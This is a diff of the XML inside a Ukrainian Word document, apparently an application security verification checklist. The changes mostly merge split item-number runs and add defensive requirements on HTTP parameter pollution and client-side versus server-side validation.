@@ -9186,17 +9166,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>2.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9497,17 +9467,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>2.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9744,17 +9704,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>2.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10023,17 +9973,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>2.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10293,17 +10233,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>2.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10592,17 +10522,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>2.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10799,17 +10719,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>2.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11047,17 +10957,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>2.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11274,17 +11174,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.10</w:t>
+              <w:t>2.10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13409,17 +13299,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>3.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13638,17 +13518,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>3.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13853,17 +13723,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>3.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14102,17 +13962,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>3.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14411,17 +14261,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>3.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14638,17 +14478,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>3.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14907,17 +14737,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>3.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15114,17 +14934,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>3.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15395,17 +15205,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>3.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15990,17 +15790,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>4.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16291,17 +16081,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>4.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16600,17 +16380,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>4.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16852,17 +16622,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>4.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17111,17 +16871,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>4.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17304,17 +17054,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>4.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17473,17 +17213,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ін'єкці</w:t>
+              <w:t xml:space="preserve"> ін'єкці</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17655,17 +17385,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>4.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18002,17 +17722,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>4.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18160,8 +17870,6 @@
               </w:rPr>
               <w:t>.</w:t>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18313,17 +18021,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>4.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18357,9 +18055,119 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що програма має захист від атак забруднення параметрів </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>HTTP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, особливо якщо фреймворк не </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>розріщняє</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> джерело параметрів запиту (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>GET</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>POST</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, заголовки, навколишнього середовища і т.д.)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -18392,7 +18200,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18427,7 +18235,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18462,7 +18270,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18510,17 +18318,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.10</w:t>
+              <w:t>4.10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18554,9 +18352,657 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>а</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні клієнта використовується в якості другої лінії оборони, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">разом з </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ою</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні сервера.</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
